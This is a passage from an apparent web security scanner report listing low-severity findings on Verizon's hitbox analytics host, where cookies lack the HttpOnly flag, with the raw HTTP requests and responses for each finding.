Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM560905OCSM&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrzB"%X%QBe%%%Xz%X%QBe%%%X"%X%QBe%%%Q"%X%QBe%%%Xrirr%r"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCri"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzXi^"%X%QBer^Xez%X%QBer^Xe"%X%QBe%XBQ"%X%QBer^Xer@rQe@"Xz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315261325

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:24:11 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzQ%Q"%X%QBer^Xez%X%QBer^Xe"%X%QBe%CQ%"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:24:11 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:24:11 GMT; max-age=31536000
Set-Cookie: CTG=1315261451; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:24:11 GMT; max-age=604800
Set-Cookie: DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz%"%X%QBe%CQrz%X%QBe%CQr"%X%QBe%CQ%"%X%QBe%CQr%%r^iQ"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:24:11 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:24:12 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.31. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM560507I8NC&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%%Q"%X%QBer^Xez%X%QBer^Xe"%X%QBe%rQ%"%X%QBer^Xer@rQe@"@%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315261051

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:33 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%@@"%X%QBer^Xez%X%QBer^Xe"%X%QBe%%%X"%X%QBer^Xer@rQe@"eBz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:18:33 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:18:33 GMT; max-age=31536000
Set-Cookie: DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrzr"%X%QBe%%%Xz%X%QBe%%%X"%X%QBe%%%X"%X%QBe%%%Xrirr%r"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:18:33 GMT; max-age=31536000
Set-Cookie: CTG=1315261113; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:18:33 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:18:34 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.32. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM56050762VV&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://promo.verizon.com/omk/online.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrz%BC^"%X%QBe%%%Xz%X%QBe%%%X"%X%QBeBXeB"%X%QBe%%%Xrirr%r"QCz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz^C@"%X%QBe%CQrz%X%QBe%CQr"%X%QBeBX^@"%X%QBe%CQr%%r^iQ"@i@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrz%BBC"%X%QBe%Xrez%X%QBe%Xre"%X%QBeBQXr"%X%QBe%XrerCrCri"%BBCz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%Q^C"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQXr"%X%QBer^Xer@rQe@"%XXz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM56050737WDV6=V1rrrrr"rz%X%QBeBQXr@Cre%ez%zrzr"%X%QBeBQXrz%X%QBeBQXr"%X%QBeBQXr"%X%QBeBQXr@Cre%e"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6@%zA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315262530

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:25 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM56050762VVV6=V1rrrrr"rz%X%QBeBQCCr^riB^z%zrz%"%X%QBeBQCCz%X%QBeBQCC"%X%QBeBQCQ"%X%QBeBQCCr^riB^"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6CzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:25 GMT; max-age=31536000
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%er^"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQCQ"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:25 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:42:25 GMT; max-age=31536000
Set-Cookie: CTG=1315262545; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:42:25 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:42:26 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.33. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM560905J1NC%3BDM550928B8DM&cd=1&hv=6&n=/overview_main_unauth&con=&vcon=/smbportal/overview_main_unauth&tt=auto&ja=y&dt=22&zo=300&lm=1315280153000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&np=Win32&nc=Windows%20NT%206.1&vpc=HBX0250u&vjs=HBX0250.11u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos,name&ra=&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pu=&pl=Mozilla%20Default%20Plug-in%3AGoogle%20Update%3AiTunes%20Application%20Detector%3AGoogle%20Earth%20Plugin%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3ASilverlight%20Plug-In%3AMicrosoft%20Office%202010%3AMicrosoft%20Office%202010%3AWPI%20Detector%201.4%3AGoogle%20Updater%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3A&lv.id=&lv.pos=&hid=0.9416435859353576 HTTP/1.1
Host: ehg-verizon.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: CTG=1315262035; DM550928B8DMV6=V1rrrrr"rz%X%QBeriBrrir%@iz%zrz%B%Q"%X%QBeriBrz%X%QBeriBr"%X%QBeBrXQ"%X%QBeriBrrir%@i"%%iz(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWaA6qU6O:ma6uDF2TaFF6W~:uI~HO:maHGIWaA6qU6O:ma6haF2_aTf2I~6W~:uI~HO:maHGIWa6OF2G:avBA6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6haF2_aTf2I~Oa~G62OIG:GDG6%BQe%B|OfmA6qU6haF2_aTf2I~6FDGG:hf6fq_QcBBA6FaIhcO6~6~6GIWa%zOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; DM560507CPCFV6=V1eB(#X"rz%X%QBeriBrrir%@iz%zrzQe"%X%QBeriBrz%X%QBeriBr"%X%QBeri@e"%X%QBeriBrrir%@i"%z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWaA6qU6O:ma6uDF2TaFF6W~:uI~HO:maHGIWaA6qU6O:ma6haF2_aTf2I~6W~:uI~HO:maHGIWa6OF2G:avBzOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; WSS_GW=V1z%X%QBeriBr; DM560905OCSMV6=V1rrrrr"rz%X%QBe%ee^errBC@z%zrzBCi"%X%QBe%ee^z%X%QBe%ee^"%X%QBe%^%@"%X%QBe%ee^errBC@"B%z(xB$qUxB$haF2_aTf2I~xB$FDGG:hfxB$haF2_aTf2I~Oa~GxB$72:FfqxB$%rrX^%xB$72:Ffqz7}z)OuKr6BizA6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6haF2_aTf2I~Oa~G62OIG:GDG6%BQe%B|OfmA6qU6haF2_aTf2I~6FDGG:hf6fq_QcBBzOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:54 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBeriBrrir%@iz%zrz%XXC"%X%QBeriBrz%X%QBeriBr"%X%QBeB%QC"%X%QBeriBrrir%@i"%%^z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWaA6qU6O:ma6uDF2TaFF6W~:uI~HO:maHGIWaA6qU6O:ma6haF2_aTf2I~6W~:uI~HO:maHGIWa6OF2G:avBA6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6qU6haF2_aTf2I~6FDGG:hf6haF2_aTf2I~Oa~G672:Ffq6%rrX^%672:FfqA6DTdT:kTHGIWaoF9A6haF2_aTf2I~Oa~G62OIG:GDG6%BQe%B|OfmA6qU6haF2_aTf2I~6FDGG:hf6fq_QcBBA6FaIhcO6~6~6GIWa%A6FmuG:hfI~6:qahq2akvmI2TvDTIDfO6:qahq2akvmI2TvDTIDfOzOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:35:54 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:35:54 GMT; max-age=31536000
Set-Cookie: CTG=1315262154; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:35:54 GMT; max-age=604800
Set-Cookie: DM560905J1NCV6=V1rrrrr"rz%X%QBeB%QCrerCQez%zrzr"%X%QBeB%QCz%X%QBeB%QC"%X%QBeB%QC"%X%QBeB%QCrerCQe"rz(xB$FmuG:hfI~xB$:qahq2akxQ$mI2TxQ$DTIDfOxB$:qahq2akxQ$mI2TxQ$DTIDfOz7}z)OuKr6%XzA6FmuG:hfI~6:qahq2akvmI2TvDTIDfO6:qahq2akvmI2TvDTIDfOzOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:35:54 GMT; max-age=31536000
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:35:55 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.34. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM5605079NES&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrzB"%X%QBe%%%Xz%X%QBe%%%X"%X%QBe%%%Q"%X%QBe%%%Xrirr%r"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCri"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzXie"%X%QBer^Xez%X%QBer^Xe"%X%QBe%XBB"%X%QBer^Xer@rQe@"%ez(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315261322

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:22:07 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzB"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XB@"%X%QBe%XBQrBrCBX"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:22:07 GMT; max-age=31536000
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzX^%"%X%QBer^Xez%X%QBer^Xe"%X%QBe%XB@"%X%QBer^Xer@rQe@"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:22:07 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:22:07 GMT; max-age=31536000
Set-Cookie: CTG=1315261327; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:22:07 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:22:08 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.35. http://ehg-verizon.hitbox.com/HGct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM550928B8DM%3BDM560507CPCF62EN3&cd=1&hv=6&n=/routing+page&con=&vcon=/vz/home/residential&tt=auto&ja=y&dt=22&zo=300&lm=1315278819000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&np=Win32&nc=Windows%20NT%206.1&vpc=HBX0200u&vjs=HBX0250.11u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos,name&ra=&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pu=&pl=Mozilla%20Default%20Plug-in%3AGoogle%20Update%3AiTunes%20Application%20Detector%3AGoogle%20Earth%20Plugin%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3ASilverlight%20Plug-In%3AMicrosoft%20Office%202010%3AMicrosoft%20Office%202010%3AWPI%20Detector%201.4%3AGoogle%20Updater%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3A&lv.id=vzw_home,vzw_home,res_home,res_home,bus_home,bus_home,corp_vz,corp_vzw,hp_res_footer_about_us,hp_res_footer_contact_us,hp_res_footer_store_locator,hp_res_footer_careers,hp_bus_footer_vzthinkfinity,hp_res_footer_sitemap,hp_res_footer_privacy_policy,hp_res_footer_terms_conditions,hp_res_footer_site_feedback,&lv.pos=,,,,,,,,,,,,,,,,,&hid=0.22088988668371046 HTTP/1.1
Host: ehg-verizon.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
Cookie: CTG=1315260819

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:13:41 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBeriBrrir%@iz%zrz%"%X%QBeriBrz%X%QBeriBr"%X%QBeriB%"%X%QBeriBrrir%@i"%z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
Set-Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBeriBrrir%@iz%zrz%"%X%QBeriBrz%X%QBeriBr"%X%QBeriB%"%X%QBeriBrrir%@i"%z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
Set-Cookie: CTG=1315260821; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:13:41 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:13:42 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.36. https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

